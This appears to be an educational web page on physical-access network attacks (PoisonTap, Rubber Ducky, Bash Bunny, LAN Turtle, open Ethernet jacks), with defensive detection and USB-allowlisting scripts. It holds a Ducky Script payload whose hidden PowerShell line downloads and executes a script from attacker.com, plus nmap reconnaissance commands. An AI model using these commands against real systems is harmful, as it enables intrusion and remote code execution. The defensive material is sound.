WiFi Attack
Physical WiFi Security Attacks
Physical access to a device or network jack opens attack vectors that bypass all WiFi-specific defenses. USB gadgets, Ethernet jacks, and hardware implants can compromise systems faster than any wireless attack — sometimes in seconds.
PoisonTap (by Samy Kamkar, 2016) exploits USB and Ethernet interfaces by emulating an Ethernet adapter over USB. When plugged into a locked computer, it:
- Hijacks all outbound network traffic (even over WiFi if connected)
- Exposes the router's internal DNS cache and poisons it
- Installs a persistent backdoor via WebSocket APIs in browsers
- Captures cookies and authentication tokens
Total time to deploy: plug in for 60 seconds. Cost: $0 (uses a Raspberry Pi Zero — or just a USB cable with modified firmware on some devices).
```text
# PoisonTap attack sequence (conceptual):
# Attacker plugs PoisonTap into locked computer
# Computer sees it as Ethernet over USB
# PoisonTap sends DHCP requests, claiming to be a gateway
# Computer updates its routing table — all traffic now goes through PoisonTap
# PoisonTap:
#   - Dumps all cookie/session data from browser cache
#   - Plants persistent backdoor in browser's localStorage
#   - Exfiltrates data to attacker server
#   - Returns computer to normal state
# Attacker unplugs. Backdoor remains.
```
Most operating systems treat USB Ethernet adapters as trusted peripherals. When a new network interface appears, the OS automatically uses it. A locked screen doesn't prevent network interface initialization. PoisonTap doesn't bypass the lock — it just adds a new network path that the computer uses before the user logs in.
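The routing-table change described above is visible from the host side, and that is where a defender can catch it. The script below is an added example (not code from the original page or from the PoisonTap project): it parses constructed sample output in the format of `ip -4 route show`, computes which interface would actually carry internet-bound traffic, and flags a secondary interface that claims on-link routes far larger than any real LAN. The interface names (`wlan0`, `enx001122334455`) and the route lines are constructed sample data.

```python
"""Audit a Linux IPv4 routing table for the PoisonTap pattern: a secondary
(USB Ethernet) interface that has acquired routes broad enough to pull
traffic away from the real uplink. Added defensive example, not code
from the original page; interface names and route lines are constructed
sample data in the format printed by `ip -4 route show`."""
import ipaddress
import re

# Constructed sample: wlan0 is the genuine uplink; enx001122334455 is a
# USB Ethernet gadget (Linux names USB NICs after their MAC) whose DHCP
# lease handed the host two on-link /1 routes that together cover every
# IPv4 address, so longest-prefix matching prefers them over the default.
POISONED_ROUTES = """\
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600
1.0.0.0/24 dev enx001122334455 proto kernel scope link src 1.0.0.10 metric 100
0.0.0.0/1 dev enx001122334455 proto dhcp scope link metric 100
128.0.0.0/1 dev enx001122334455 proto dhcp scope link metric 100
"""

# Constructed sample of the same host before the gadget was plugged in.
CLEAN_ROUTES = """\
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600
"""

ROUTE_RE = re.compile(r"^(?P<dst>\S+)(?: via (?P<via>\S+))? dev (?P<dev>\S+)(?P<rest>.*)$")


def parse_routes(text):
    """Turn `ip route` lines into dicts with an ip_network destination."""
    routes = []
    for line in text.splitlines():
        m = ROUTE_RE.match(line.strip())
        if not m:
            continue  # blank or unrecognised line: skipped, not fatal
        dst = m.group("dst")
        net = ipaddress.ip_network("0.0.0.0/0" if dst == "default" else dst, strict=False)
        metric = re.search(r"\bmetric (\d+)", m.group("rest"))
        routes.append({
            "dst": net,
            "via": m.group("via"),
            "dev": m.group("dev"),
            "onlink": " scope link" in m.group("rest"),
            "metric": int(metric.group(1)) if metric else 0,
        })
    return routes


def next_hop_dev(text, addr):
    """Which interface wins for addr: longest prefix first, then lowest metric."""
    ip = ipaddress.ip_address(addr)
    best = None
    for r in parse_routes(text):
        if ip in r["dst"]:
            key = (r["dst"].prefixlen, -r["metric"])
            if best is None or key > best[0]:
                best = (key, r["dev"])
    return best[1] if best else None


def audit_routes(text, primary_dev, max_onlink_prefix=8):
    """Return human-readable findings for routes on non-primary interfaces.

    Two signals: an on-link route far larger than any real LAN (no physical
    segment is a /8 or shorter), and a non-primary interface that would now
    carry internet-bound traffic."""
    findings = []
    for r in parse_routes(text):
        if r["dev"] == primary_dev:
            continue
        if r["onlink"] and r["dst"].prefixlen <= max_onlink_prefix:
            findings.append(
                f"{r['dev']}: on-link route {r['dst']} claims "
                f"{r['dst'].num_addresses} addresses are directly reachable")
    # 203.0.113.0/24 is TEST-NET-3, used here only as a representative
    # "somewhere on the internet" address.
    winner = next_hop_dev(text, "203.0.113.5")
    if winner and winner != primary_dev:
        findings.append(f"{winner}: internet-bound traffic now leaves via this "
                        f"interface instead of {primary_dev}")
    return findings


if __name__ == "__main__":
    for f in audit_routes(POISONED_ROUTES, "wlan0"):
        print("FINDING:", f)
    print("clean table findings:", audit_routes(CLEAN_ROUTES, "wlan0"))
```

On a real host the text would come from `ip -4 route show` (or a netlink route-change event), and the audit would run whenever a new interface appears; the on-link-prefix threshold is the part worth tuning, since an /8 on-link route is already far outside anything a physical LAN would advertise.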
Rubber Ducky / Keystroke Injection
The USB Rubber Ducky is a USB device that looks like a normal flash drive but types at superhuman speed — emulating a keyboard. When plugged in, it executes a pre-programmed keystroke sequence that can run commands, download malware, or exfiltrate data in seconds.
| Feature | Rubber Ducky | Native OS Keyboard |
|---|---|---|
| Speed | ~1000 characters/second | ~5-10 characters/second |
| Detection by AV | Very hard (it's a keyboard) | N/A |
| Requires admin | Sometimes (Bypass-UAC technique) | N/A |
| Physical form | Looks like flash drive | N/A |
```text
REM Ducky Script example (reverse shell payload)
REM Open PowerShell and download/execute Meterpreter
DELAY 1000
GUI r
DELAY 500
STRING powershell -windowstyle hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
ENTER
```
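The speed row in the table above is also the detection handle: a keyboard that types a whole STRING line in a fraction of a second, with near-identical gaps between keys, is not a person. The following is an added defensive example (not code from the original page or from Hak5) showing the timing check an EDR sensor or a host-side evdev reader could apply. Both event streams are constructed: a human-like stream with gaps of 80-300 ms and an injected stream with gaps of about 1 ms.

```python
"""Detect keystroke injection from timing alone. A person types roughly
5-10 characters per second with irregular gaps; a Rubber Ducky-class
device types hundreds per second with almost metronomic gaps. Added
defensive example, not code from the original page; the event streams
are constructed (timestamps in seconds of key-down events from a single
keyboard device, as an EDR sensor or evdev reader would log them)."""
import random
import statistics


def build_human_stream(n=40, seed=7):
    """Constructed: n key-downs with gaps drawn uniformly from 80-300 ms."""
    rng = random.Random(seed)
    t, ts = 0.0, []
    for _ in range(n):
        ts.append(t)
        t += rng.uniform(0.08, 0.30)
    return ts


def build_injected_stream(n=120):
    """Constructed: n key-downs about 1 ms apart with +/-2% jitter, i.e. a
    ~120-character STRING line being typed in well under a second."""
    t, ts = 0.0, []
    for i in range(n):
        ts.append(t)
        t += 0.001 * (1 + 0.02 * ((i % 3) - 1))
    return ts


HUMAN_EVENTS = build_human_stream()
INJECTED_EVENTS = build_injected_stream()


def detect_injection(timestamps, window=16, max_human_rate=20.0, max_cv=0.25):
    """Slide a window of `window` keys across the stream and report the first
    burst that is both faster than any human (keys/s above max_human_rate)
    and too regular to be human (coefficient of variation of the inter-key
    gaps below max_cv). Returns a finding dict, or None."""
    for i in range(len(timestamps) - window + 1):
        w = timestamps[i:i + window]
        span = w[-1] - w[0]
        if span <= 0:
            continue
        rate = (window - 1) / span
        gaps = [b - a for a, b in zip(w, w[1:])]
        mean_gap = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean_gap if mean_gap > 0 else 0.0
        if rate > max_human_rate and cv < max_cv:
            return {"start_index": i, "rate": rate, "cv": cv}
    return None


if __name__ == "__main__":
    print("human   :", detect_injection(HUMAN_EVENTS))
    print("injected:", detect_injection(INJECTED_EVENTS))
```

Requiring both conditions (rate and regularity) keeps a fast typist or a key held down with auto-repeat from tripping the rule; the thresholds are starting points, and the window of 16 keys is shorter than the STRING line in the script above, so a single injected command is enough to trigger.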
Bash Bunny
The Bash Bunny (by Hak5) is an advanced USB attack platform — essentially a mini Linux computer in a USB form factor. It can switch between keyboard emulation (Rubber Ducky mode) and mass storage mode, and run full Linux payloads for complex attacks including network bridging, credential harvesting, and payload delivery.
LAN Turtle
The LAN Turtle is a small Linux computer that plugs into an Ethernet port and provides stealthy remote access. It performs:
- USB Ethernet emulation: Appears as a normal network adapter
- SSH tunnel: Creates an outbound connection to attacker server
- Man-in-the-middle: Sits between the victim machine and the real network
- Module system: Downloadable modules for various attacks (packet capture, keylogger, etc.)
Cost: ~$60. Physical size: fits in a jacket pocket. Can be left in place for months — it's powered by PoE (Power over Ethernet) or draws power from the Ethernet connection itself.
Ethernet Jack Attacks
Physical access to an Ethernet jack provides direct access to the local network, bypassing all WiFi encryption. In many office buildings, Ethernet jacks in conference rooms, hallways, and guest areas are not properly network-segmented.
```bash
# Attacker plugs into open Ethernet jack
# Gets DHCP IP from corporate network
# Immediate recon
$ nmap -sn 192.168.1.0/24      # Scan entire subnet
$ nmap -sV -O 192.168.1.1      # Identify router
# Now on the internal network — no WPA2 to break
# Full visibility into all internal traffic
```
Defense Against Physical Access Attacks
- Disable unused USB ports: BIOS/UEFI settings can disable USB entirely or require authentication
- USB port blocking: Physical USB port locks or soldered ports on sensitive machines
- USBGuard (Linux): USB device allowlisting built on the kernel's USB authorization framework
- Endpoint detection and response (EDR): Modern EDR can detect keystroke injection patterns
- Network access control (NAC): 802.1X authentication prevents unauthorized Ethernet devices from joining the network
- Network segmentation: Guest and office VLANs, even for physical ports
- Full-disk encryption: Doesn't prevent PoisonTap but limits damage if device is stolen
- Locked screens + BIOS passwords: Makes it harder to use a physical device on your machine
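The allowlisting item above is the control that addresses PoisonTap, LAN Turtle and Rubber Ducky-class devices in one place: a device that is not known is not authorized, whatever it claims to be. The script below is an added example (not code from the original page or from the USBGuard project) of the decision logic such a deny-by-default policy applies when a device attaches. Every vendor:product ID, serial and device record is constructed, and the policy is written as plain Python rather than USBGuard's own rule syntax.

```python
"""Decide whether a newly attached USB device should be authorized, the
deny-by-default, allowlist-driven way USBGuard operates: known devices
are allowed by ID and serial, hubs pass, USB Ethernet gadgets (the
PoisonTap / LAN Turtle class) are blocked, and a device that is both a
keyboard and a drive (Rubber Ducky / Bash Bunny style) is rejected.
Added defensive example, not code from the page; the policy language is
illustrative (USBGuard has its own rule syntax), and every device record
and vendor:product ID below is constructed, not a real product."""

# Standard USB interface class codes (base class byte of a cc:ss:pp triplet).
CDC_COMM, HID, MASS_STORAGE, HUB, CDC_DATA = 0x02, 0x03, 0x08, 0x09, 0x0A

# Constructed allowlist: (vendor:product, serial). serial None = any serial.
ALLOWLIST = {
    ("1234:0001", "KB-00042"),   # the user's own keyboard, pinned by serial
    ("1234:0002", None),         # a hardware security token model
}


def interface_classes(device):
    """Interfaces are 'cc:ss:pp' hex triplets as USBGuard and lsusb show them."""
    return {int(desc.split(":")[0], 16) for desc in device["interfaces"]}


def decide(device):
    """Return (decision, reason). decision is 'allow', 'block' (deny but keep
    attached, can be authorized later) or 'reject' (detach outright)."""
    classes = interface_classes(device)
    key_any = (device["id"], None)
    key_serial = (device["id"], device.get("serial"))
    if classes and classes <= {HUB}:
        return "allow", "hub"
    if key_serial in ALLOWLIST or key_any in ALLOWLIST:
        if MASS_STORAGE in classes and HID in classes:
            return "reject", "allowlisted id presenting both keyboard and storage"
        return "allow", "allowlisted device"
    if classes & {CDC_COMM, CDC_DATA}:
        return "block", "network interface over USB (CDC) from unknown device"
    if HID in classes and MASS_STORAGE in classes:
        return "reject", "composite keyboard + storage (BadUSB pattern)"
    if HID in classes:
        return "block", "unknown keyboard/HID; authorize manually if legitimate"
    return "block", "not on allowlist"


# Constructed device records as a USB authorization hook would receive them.
SAMPLE_DEVICES = [
    {"id": "1234:0001", "serial": "KB-00042", "name": "desk keyboard", "interfaces": ["03:01:01"]},
    {"id": "1234:0001", "serial": "KB-99999", "name": "same model, other serial", "interfaces": ["03:01:01"]},
    {"id": "1234:0002", "serial": "T-7", "name": "security token", "interfaces": ["03:00:00"]},
    {"id": "5678:0100", "serial": None, "name": "usb ethernet gadget", "interfaces": ["02:06:00", "0a:00:00"]},
    {"id": "5678:0200", "serial": None, "name": "flash drive that also types", "interfaces": ["08:06:50", "03:01:01"]},
    {"id": "5678:0300", "serial": None, "name": "plain flash drive", "interfaces": ["08:06:50"]},
    {"id": "0000:0000", "serial": None, "name": "root hub", "interfaces": ["09:00:00"]},
]


def decide_all(devices):
    """Map each device name to its (decision, reason)."""
    return {d["name"]: decide(d) for d in devices}


if __name__ == "__main__":
    for name, (decision, reason) in decide_all(SAMPLE_DEVICES).items():
        print(f"{decision:6} {name:28} {reason}")
```

Two design points carry over to a real policy: pin keyboards by serial rather than by model, since a gadget can present any vendor:product ID it likes, and treat a CDC (Ethernet-over-USB) interface on an unknown device as a network attachment to be blocked, not as a harmless peripheral.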
Understand the Threat. Build the Defense.
Learn how to protect yourself and your organization against physical attacks.